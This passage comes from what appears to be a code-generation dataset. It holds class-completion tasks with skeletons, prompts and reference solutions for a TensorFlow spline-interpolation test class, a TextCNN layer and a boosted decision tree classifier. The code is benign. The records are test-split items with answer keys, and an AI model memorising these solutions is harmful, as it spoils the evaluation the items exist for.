a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data yields the best reconstruction for the function values at the query points. The training data locations are optimized iteratively using gradient descent.", "name": "test_interpolation_gradient", "signature": "def test_interpolation_gradient(self)"}], "n_methods": 4, "prompt": "Implement the Python class `InterpolateSplineTest` described below.\n\nClass description:\nImplement the InterpolateSplineTest class.\n\nMethod signatures and docstrings:\n- def test_1d_linear_interpolation(self): For 1d linear interpolation, we can compare directly to scipy.\n- def test_1d_interpolation(self): Regression test for interpolation with 1-D points.\n- def test_nd_linear_interpolation(self): Regression test for interpolation with N-D points.\n- def test_interpolation_gradient(self): Make sure that backprop can run. Correctness of gradients is assumed. Here, we create a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data yields the best reconstruction for the function values at the query points. 
The training data locations are optimized iteratively using gradient descent.", "prompted_full_text": "Implement the Python class `InterpolateSplineTest` described below.\n\nClass description:\nImplement the InterpolateSplineTest class.\n\nMethod signatures and docstrings:\n- def test_1d_linear_interpolation(self): For 1d linear interpolation, we can compare directly to scipy.\n- def test_1d_interpolation(self): Regression test for interpolation with 1-D points.\n- def test_nd_linear_interpolation(self): Regression test for interpolation with N-D points.\n- def test_interpolation_gradient(self): Make sure that backprop can run. Correctness of gradients is assumed. Here, we create a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data yields the best reconstruction for the function values at the query points. The training data locations are optimized iteratively using gradient descent.\n\n<|skeleton|>\nclass InterpolateSplineTest:\n\n def test_1d_linear_interpolation(self):\n \"\"\"For 1d linear interpolation, we can compare directly to scipy.\"\"\"\n <|body_0|>\n\n def test_1d_interpolation(self):\n \"\"\"Regression test for interpolation with 1-D points.\"\"\"\n <|body_1|>\n\n def test_nd_linear_interpolation(self):\n \"\"\"Regression test for interpolation with N-D points.\"\"\"\n <|body_2|>\n\n def test_interpolation_gradient(self):\n \"\"\"Make sure that backprop can run. Correctness of gradients is assumed. Here, we create a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data yields the best reconstruction for the function values at the query points. 
The training data locations are optimized iteratively using gradient descent.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(extrapolate=False, dtype='float64')\n interpolation_order = 1\n with ops.name_scope('interpolator'):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order)\n with self.test_session() as sess:\n fetches = [query_points, train_points, train_values, interpolator]\n query_points_, train_points_, train_values_, interp_ = sess.run(fetches)\n interp_ = interp_[0, :, 0]\n query_points_ = query_points_[0, :, 0]\n train_points_ = train_points_[0, :, 0]\n train_values_ = train_values_[0, :, 0]\n scipy_interp_function = sc_interpolate.interp1d(train_points_, train_values_, kind='linear')\n scipy_interpolation = scipy_interp_function(query_points_)\n scipy_interpolation_on_train = scipy_interp_function(train_points_)\n tol = 0.001\n self.assertAllClose(train_values_, scipy_interpolation_on_train, atol=tol, rtol=tol)\n self.assertAllClose(interp_, scipy_interpolation, atol=tol, rtol=tol)\n<|end_body_0|>\n\n<|body_start_1|>\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n<|end_body_1|>\n\n<|body_start_2|>\n tp = _QuadraticPlusSinProblemND()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n<|end_body_2|>\n\n<|body_start_3|>\n tp = _QuadraticPlusSinProblemND()\n query_points, query_values, train_points, train_values = tp.get_problem(optimizable=True)\n regularization = 0.001\n for interpolation_order in (1, 2, 3, 4):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order, regularization)\n loss = math_ops.reduce_mean(math_ops.square(query_values - interpolator))\n optimizer = momentum.MomentumOptimizer(0.001, 0.9)\n grad = gradients.gradients(loss, [train_points])\n grad, _ = clip_ops.clip_by_global_norm(grad, 1.0)\n opt_func = optimizer.apply_gradients(zip(grad, [train_points]))\n init_op = variables.global_variables_initializer()\n with self.test_session() as sess:\n sess.run(init_op)\n for _ in range(100):\n sess.run([loss, opt_func])\n<|end_body_3|>\n", "revision_id": "181bc2b37aa8a3eeb11a942d8f330b04abc804b3", "skeleton": "<|skeleton|>\nclass InterpolateSplineTest:\n\n def test_1d_linear_interpolation(self):\n \"\"\"For 1d linear interpolation, we can compare directly to scipy.\"\"\"\n <|body_0|>\n\n def test_1d_interpolation(self):\n \"\"\"Regression test for interpolation with 1-D 
points.\"\"\"\n <|body_1|>\n\n def test_nd_linear_interpolation(self):\n \"\"\"Regression test for interpolation with N-D points.\"\"\"\n <|body_2|>\n\n def test_interpolation_gradient(self):\n \"\"\"Make sure that backprop can run. Correctness of gradients is assumed. Here, we create a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data yields the best reconstruction for the function values at the query points. The training data locations are optimized iteratively using gradient descent.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class InterpolateSplineTest:\n def test_1d_linear_interpolation(self):\n \"\"\"For 1d linear interpolation, we can compare directly to scipy.\"\"\"\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(extrapolate=False, dtype='float64')\n interpolation_order = 1\n with ops.name_scope('interpolator'):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order)\n with self.test_session() as sess:\n fetches = [query_points, train_points, train_values, interpolator]\n query_points_, train_points_, train_values_, interp_ = sess.run(fetches)\n interp_ = interp_[0, :, 0]\n query_points_ = query_points_[0, :, 0]\n train_points_ = train_points_[0, :, 0]\n train_values_ = train_values_[0, :, 0]\n scipy_interp_function = sc_interpolate.interp1d(train_points_, train_values_, kind='linear')\n scipy_interpolation = scipy_interp_function(query_points_)\n scipy_interpolation_on_train = scipy_interp_function(train_points_)\n tol = 0.001\n self.assertAllClose(train_values_, scipy_interpolation_on_train, atol=tol, rtol=tol)\n self.assertAllClose(interp_, scipy_interpolation, atol=tol, rtol=tol)\n\n def test_1d_interpolation(self):\n \"\"\"Regression test for interpolation with 1-D points.\"\"\"\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n\n def test_nd_linear_interpolation(self):\n \"\"\"Regression test for interpolation with N-D points.\"\"\"\n tp = _QuadraticPlusSinProblemND()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n\n def test_interpolation_gradient(self):\n \"\"\"Make sure that backprop can run. Correctness of gradients is assumed. 
Here, we create a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data yields the best reconstruction for the function values at the query points. The training data locations are optimized iteratively using gradient descent.\"\"\"\n tp = _QuadraticPlusSinProblemND()\n query_points, query_values, train_points, train_values = tp.get_problem(optimizable=True)\n regularization = 0.001\n for interpolation_order in (1, 2, 3, 4):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order, regularization)\n loss = math_ops.reduce_mean(math_ops.square(query_values - interpolator))\n optimizer = momentum.MomentumOptimizer(0.001, 0.9)\n grad = gradients.gradients(loss, [train_points])\n grad, _ = clip_ops.clip_by_global_norm(grad, 1.0)\n opt_func = optimizer.apply_gradients(zip(grad, [train_points]))\n init_op = variables.global_variables_initializer()\n with self.test_session() as sess:\n sess.run(init_op)\n for _ in range(100):\n sess.run([loss, opt_func])\n", "source": "the_stack_v2_python_sparse", "source_path": "tensorflow/contrib/image/python/kernel_tests/interpolate_spline_test.py", "source_repo": "zylo117/tensorflow-gpu-macosx", "split": "test", "star_events_count": 116} {"blob_id": "224ee86b1b335501d77a4ca4092a1c7b893bc2c5", "bodies": ["TFBaseLayer.__init__(self)\nself.in_hidden = in_hidden\nself.emb_size = self.in_hidden.get_shape()[-1]\nself.max_seq_len = max_seq_len\nself.filter_sizes = filter_sizes\nself.num_filters = num_filters\nself.training = training\nself.scope = scope", "embedded_words_expanded = tf.expand_dims(self.in_hidden, -1)\npooled_outputs = []\nfor i, filter_size in enumerate(self.filter_sizes):\n with tf.variable_scope(self.scope + '-' + str(filter_size), reuse=tf.AUTO_REUSE):\n filter_shape = [filter_size, self.emb_size, 1, self.num_filters]\n filters = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='filters')\n W = tf.get_variable('W' + str(filter_size), shape=filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1))\n b = tf.get_variable('b' + str(filter_size), shape=[self.num_filters], initializer=tf.zeros_initializer())\n conv = tf.nn.conv2d(embedded_words_expanded, W, strides=[1, 1, 1, 1], padding='VALID', name='conv' + str(filter_size))\n conv = tf.add(conv, b)\n bn_conv = tf.layers.batch_normalization(conv, training=self.training, name='BN')\n hidden = tf.nn.relu(bn_conv, name='relu')\n pooled = tf.nn.max_pool(hidden, ksize=[1, self.max_seq_len - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name='pool' + str(filter_size))\n pooled_outputs.append(pooled)\nfeature_dim = self.num_filters * len(self.filter_sizes)\nh_pool = tf.concat(pooled_outputs, 3)\noutput = tf.reshape(h_pool, [-1, feature_dim])\nreturn output"], "bodies_text": "<|body_start_0|>\n TFBaseLayer.__init__(self)\n self.in_hidden = in_hidden\n self.emb_size = self.in_hidden.get_shape()[-1]\n self.max_seq_len = max_seq_len\n self.filter_sizes = filter_sizes\n self.num_filters = num_filters\n self.training = training\n self.scope = scope\n<|end_body_0|>\n\n<|body_start_1|>\n embedded_words_expanded = tf.expand_dims(self.in_hidden, -1)\n pooled_outputs = []\n for i, filter_size in enumerate(self.filter_sizes):\n with tf.variable_scope(self.scope + '-' + str(filter_size), reuse=tf.AUTO_REUSE):\n filter_shape = [filter_size, 
self.emb_size, 1, self.num_filters]\n filters = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='filters')\n W = tf.get_variable('W' + str(filter_size), shape=filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1))\n b = tf.get_variable('b' + str(filter_size), shape=[self.num_filters], initializer=tf.zeros_initializer())\n conv = tf.nn.conv2d(embedded_words_expanded, W, strides=[1, 1, 1, 1], padding='VALID', name='conv' + str(filter_size))\n conv = tf.add(conv, b)\n bn_conv = tf.layers.batch_normalization(conv, training=self.training, name='BN')\n hidden = tf.nn.relu(bn_conv, name='relu')\n pooled = tf.nn.max_pool(hidden, ksize=[1, self.max_seq_len - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name='pool' + str(filter_size))\n pooled_outputs.append(pooled)\n feature_dim = self.num_filters * len(self.filter_sizes)\n h_pool = tf.concat(pooled_outputs, 3)\n output = tf.reshape(h_pool, [-1, feature_dim])\n return output\n<|end_body_1|>\n", "class_docstring": "TextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling", "class_name": "TFTextCNNLayer", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TFTextCNNLayer:\n \"\"\"TextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling\"\"\"\n\n def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn'):\n \"\"\"TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数\"\"\"\n <|body_0|>\n\n def build(self):\n \"\"\"TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n TFBaseLayer.__init__(self)\n self.in_hidden = in_hidden\n self.emb_size = self.in_hidden.get_shape()[-1]\n self.max_seq_len = max_seq_len\n self.filter_sizes = filter_sizes\n self.num_filters = num_filters\n self.training = training\n self.scope = scope\n<|end_body_0|>\n\n<|body_start_1|>\n embedded_words_expanded = tf.expand_dims(self.in_hidden, -1)\n pooled_outputs = []\n for i, filter_size in enumerate(self.filter_sizes):\n with tf.variable_scope(self.scope + '-' + str(filter_size), reuse=tf.AUTO_REUSE):\n filter_shape = [filter_size, self.emb_size, 1, self.num_filters]\n filters = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='filters')\n W = tf.get_variable('W' + str(filter_size), shape=filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1))\n b = tf.get_variable('b' + str(filter_size), shape=[self.num_filters], initializer=tf.zeros_initializer())\n conv = tf.nn.conv2d(embedded_words_expanded, W, strides=[1, 1, 1, 1], padding='VALID', name='conv' + str(filter_size))\n conv = tf.add(conv, b)\n bn_conv = tf.layers.batch_normalization(conv, training=self.training, name='BN')\n hidden = tf.nn.relu(bn_conv, name='relu')\n pooled = tf.nn.max_pool(hidden, ksize=[1, self.max_seq_len - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name='pool' + str(filter_size))\n pooled_outputs.append(pooled)\n feature_dim = self.num_filters * len(self.filter_sizes)\n h_pool = tf.concat(pooled_outputs, 3)\n output = tf.reshape(h_pool, [-1, feature_dim])\n return output\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000010", "length_bytes": 4283, "license_type": "permissive", "methods": [{"docstring": "TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: 
array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数", "name": "__init__", "signature": "def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn')"}, {"docstring": "TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]", "name": "build", "signature": "def build(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000375", "prompt": "Implement the Python class `TFTextCNNLayer` described below.\n\nClass description:\nTextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling\n\nMethod signatures and docstrings:\n- def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn'): TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数\n- def build(self): TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]", "prompted_full_text": "Implement the Python class `TFTextCNNLayer` described below.\n\nClass description:\nTextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling\n\nMethod signatures and docstrings:\n- def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn'): TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数\n- def build(self): TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]\n\n<|skeleton|>\nclass TFTextCNNLayer:\n \"\"\"TextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling\"\"\"\n\n def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn'):\n \"\"\"TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数\"\"\"\n <|body_0|>\n\n def build(self):\n \"\"\"TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n TFBaseLayer.__init__(self)\n self.in_hidden = in_hidden\n self.emb_size = self.in_hidden.get_shape()[-1]\n self.max_seq_len = max_seq_len\n self.filter_sizes = filter_sizes\n self.num_filters = num_filters\n self.training = training\n self.scope = scope\n<|end_body_0|>\n\n<|body_start_1|>\n embedded_words_expanded = tf.expand_dims(self.in_hidden, -1)\n pooled_outputs = []\n for i, filter_size in enumerate(self.filter_sizes):\n with tf.variable_scope(self.scope + '-' + str(filter_size), reuse=tf.AUTO_REUSE):\n filter_shape = [filter_size, self.emb_size, 1, self.num_filters]\n filters = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='filters')\n W = tf.get_variable('W' + str(filter_size), shape=filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1))\n b = tf.get_variable('b' + str(filter_size), shape=[self.num_filters], initializer=tf.zeros_initializer())\n conv = tf.nn.conv2d(embedded_words_expanded, W, strides=[1, 1, 1, 1], padding='VALID', name='conv' + str(filter_size))\n conv = tf.add(conv, b)\n bn_conv = tf.layers.batch_normalization(conv, training=self.training, name='BN')\n hidden = tf.nn.relu(bn_conv, name='relu')\n pooled = tf.nn.max_pool(hidden, ksize=[1, self.max_seq_len - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name='pool' + str(filter_size))\n pooled_outputs.append(pooled)\n feature_dim = self.num_filters * len(self.filter_sizes)\n h_pool = tf.concat(pooled_outputs, 3)\n output = 
tf.reshape(h_pool, [-1, feature_dim])\n return output\n<|end_body_1|>\n", "revision_id": "c4423c2625c398f5a93c747f3516f378b31ece46", "skeleton": "<|skeleton|>\nclass TFTextCNNLayer:\n \"\"\"TextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling\"\"\"\n\n def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn'):\n \"\"\"TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数\"\"\"\n <|body_0|>\n\n def build(self):\n \"\"\"TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TFTextCNNLayer:\n \"\"\"TextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling\"\"\"\n\n def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn'):\n \"\"\"TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数\"\"\"\n TFBaseLayer.__init__(self)\n self.in_hidden = in_hidden\n self.emb_size = self.in_hidden.get_shape()[-1]\n self.max_seq_len = max_seq_len\n self.filter_sizes = filter_sizes\n self.num_filters = num_filters\n self.training = training\n self.scope = scope\n\n def build(self):\n \"\"\"TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]\"\"\"\n embedded_words_expanded = tf.expand_dims(self.in_hidden, -1)\n pooled_outputs = []\n for i, filter_size in enumerate(self.filter_sizes):\n with tf.variable_scope(self.scope + '-' + str(filter_size), reuse=tf.AUTO_REUSE):\n filter_shape = [filter_size, self.emb_size, 1, self.num_filters]\n filters = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='filters')\n W = tf.get_variable('W' + str(filter_size), shape=filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1))\n b = tf.get_variable('b' + str(filter_size), shape=[self.num_filters], initializer=tf.zeros_initializer())\n conv = tf.nn.conv2d(embedded_words_expanded, W, strides=[1, 1, 1, 1], padding='VALID', name='conv' + str(filter_size))\n conv = tf.add(conv, b)\n bn_conv = tf.layers.batch_normalization(conv, training=self.training, name='BN')\n hidden = tf.nn.relu(bn_conv, name='relu')\n pooled = tf.nn.max_pool(hidden, ksize=[1, self.max_seq_len - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name='pool' + str(filter_size))\n pooled_outputs.append(pooled)\n feature_dim = self.num_filters * len(self.filter_sizes)\n h_pool = tf.concat(pooled_outputs, 3)\n output = tf.reshape(h_pool, [-1, feature_dim])\n return output\n", "source": "the_stack_v2_python_sparse", "source_path": "layers/tf_textcnn_layer.py", "source_repo": "snowhws/deeplearning", "split": "test", "star_events_count": 10} {"blob_id": "c3a6ca64f933d03a2deb5162d8b20cdb71dd0bb4", "bodies": ["self.clfs = []\nself.betas = []\nself.numBoostingIters = numBoostingIters\nself.maxTreeDepth = maxTreeDepth\nself.K = None\nself.classes = None", "X = X.to_numpy()\ny = y.to_numpy()\nn, d = X.shape\ny = y.reshape(-1, 1)\nself.classes = np.unique(y)\nself.K = len(self.classes)\nweights = np.full(n, 1 / n).reshape(-1, 1)\nfor iter_num in range(self.numBoostingIters):\n h = tree.DecisionTreeClassifier(max_depth=self.maxTreeDepth, random_state=random_state)\n h.fit(X, y, sample_weight=weights.flatten())\n self.clfs.append(h)\n y_pred = 
h.predict(X).reshape(-1, 1)\n epsilon = np.sum((y_pred != y) * weights)\n beta = np.log((self.K - 1) * (1 - epsilon) / epsilon) / 2\n self.betas.append(beta)\n weights[y_pred == y] *= np.exp(-beta)\n weights[y_pred != y] *= np.exp(beta)\n weights /= sum(weights)", "X = X.to_numpy()\nn, d = X.shape\nproba = np.zeros((n, self.K))\nfor iter_num in range(self.numBoostingIters):\n proba += self.clfs[iter_num].predict_proba(X)\nmax_proba = np.argmax(proba, axis=1).reshape(-1)\npred_array = np.tile(self.classes, (n, 1))\ny_pred = np.choose(max_proba, pred_array.T).reshape(-1, 1)\nreturn pd.DataFrame(y_pred)"], "bodies_text": "<|body_start_0|>\n self.clfs = []\n self.betas = []\n self.numBoostingIters = numBoostingIters\n self.maxTreeDepth = maxTreeDepth\n self.K = None\n self.classes = None\n<|end_body_0|>\n\n<|body_start_1|>\n X = X.to_numpy()\n y = y.to_numpy()\n n, d = X.shape\n y = y.reshape(-1, 1)\n self.classes = np.unique(y)\n self.K = len(self.classes)\n weights = np.full(n, 1 / n).reshape(-1, 1)\n for iter_num in range(self.numBoostingIters):\n h = tree.DecisionTreeClassifier(max_depth=self.maxTreeDepth, random_state=random_state)\n h.fit(X, y, sample_weight=weights.flatten())\n self.clfs.append(h)\n y_pred = h.predict(X).reshape(-1, 1)\n epsilon = np.sum((y_pred != y) * weights)\n beta = np.log((self.K - 1) * (1 - epsilon) / epsilon) / 2\n self.betas.append(beta)\n weights[y_pred == y] *= np.exp(-beta)\n weights[y_pred != y] *= np.exp(beta)\n weights /= sum(weights)\n<|end_body_1|>\n\n<|body_start_2|>\n X = X.to_numpy()\n n, d = X.shape\n proba = np.zeros((n, self.K))\n for iter_num in range(self.numBoostingIters):\n proba += self.clfs[iter_num].predict_proba(X)\n max_proba = np.argmax(proba, axis=1).reshape(-1)\n pred_array = np.tile(self.classes, (n, 1))\n y_pred = np.choose(max_proba, pred_array.T).reshape(-1, 1)\n return pd.DataFrame(y_pred)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "BoostedDT", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BoostedDT:\n\n def __init__(self, numBoostingIters=100, maxTreeDepth=3):\n \"\"\"Constructor Class Fields clfs : List object containing individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting\"\"\"\n <|body_0|>\n\n def fit(self, X, y, random_state=None):\n \"\"\"Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. 
Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value\"\"\"\n <|body_1|>\n\n def predict(self, X):\n \"\"\"Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.clfs = []\n self.betas = []\n self.numBoostingIters = numBoostingIters\n self.maxTreeDepth = maxTreeDepth\n self.K = None\n self.classes = None\n<|end_body_0|>\n\n<|body_start_1|>\n X = X.to_numpy()\n y = y.to_numpy()\n n, d = X.shape\n y = y.reshape(-1, 1)\n self.classes = np.unique(y)\n self.K = len(self.classes)\n weights = np.full(n, 1 / n).reshape(-1, 1)\n for iter_num in range(self.numBoostingIters):\n h = tree.DecisionTreeClassifier(max_depth=self.maxTreeDepth, random_state=random_state)\n h.fit(X, y, sample_weight=weights.flatten())\n self.clfs.append(h)\n y_pred = h.predict(X).reshape(-1, 1)\n epsilon = np.sum((y_pred != y) * weights)\n beta = np.log((self.K - 1) * (1 - epsilon) / epsilon) / 2\n self.betas.append(beta)\n weights[y_pred == y] *= np.exp(-beta)\n weights[y_pred != y] *= np.exp(beta)\n weights /= sum(weights)\n<|end_body_1|>\n\n<|body_start_2|>\n X = X.to_numpy()\n n, d = X.shape\n proba = np.zeros((n, self.K))\n for iter_num in range(self.numBoostingIters):\n proba += self.clfs[iter_num].predict_proba(X)\n max_proba = np.argmax(proba, axis=1).reshape(-1)\n pred_array = np.tile(self.classes, (n, 1))\n y_pred = np.choose(max_proba, pred_array.T).reshape(-1, 1)\n return pd.DataFrame(y_pred)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000011", "length_bytes": 2622, "license_type": "no_license", "methods": [{"docstring": "Constructor Class Fields clfs : List object containing individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting", "name": "__init__", "signature": "def __init__(self, numBoostingIters=100, maxTreeDepth=3)"}, {"docstring": "Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value", "name": "fit", "signature": "def fit(self, X, y, random_state=None)"}, {"docstring": "Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions", "name": "predict", "signature": "def predict(self, X)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000496", "prompt": "Implement the Python class `BoostedDT` described below.\n\nClass description:\nImplement the BoostedDT class.\n\nMethod signatures and docstrings:\n- def __init__(self, numBoostingIters=100, maxTreeDepth=3): Constructor Class Fields clfs : List object containing individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting\n- def fit(self, X, y, random_state=None): Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. 
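[Editor's illustration] The BoostedDT record above implements the multi-class AdaBoost (SAMME) weight update inside its fit body. The sketch below pulls that update out as a standalone numpy function so the arithmetic can be checked in isolation; the function name and the toy inputs are assumptions for the example, not part of the record.

    import numpy as np

    def samme_weight_update(weights, y, y_pred, K):
        # Weighted error rate of the current weak learner (weights sum to 1).
        epsilon = np.sum((y_pred != y) * weights)
        # Half the SAMME log-odds, exactly as computed in the record's fit body.
        beta = 0.5 * np.log((K - 1) * (1 - epsilon) / epsilon)
        updated = weights.copy()
        updated[y_pred == y] *= np.exp(-beta)   # down-weight correct samples
        updated[y_pred != y] *= np.exp(beta)    # up-weight mistakes
        return updated / updated.sum(), beta

    # Toy check: three samples, one misclassified, K = 3 classes.
    w = np.full(3, 1 / 3)
    w2, beta = samme_weight_update(w, np.array([0, 1, 2]), np.array([0, 1, 1]), K=3)
    # beta == 0.5 * ln(4) ~= 0.693; the misclassified sample's weight doubles
    # (2/3 after normalization), the correct ones halve (1/6 each).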
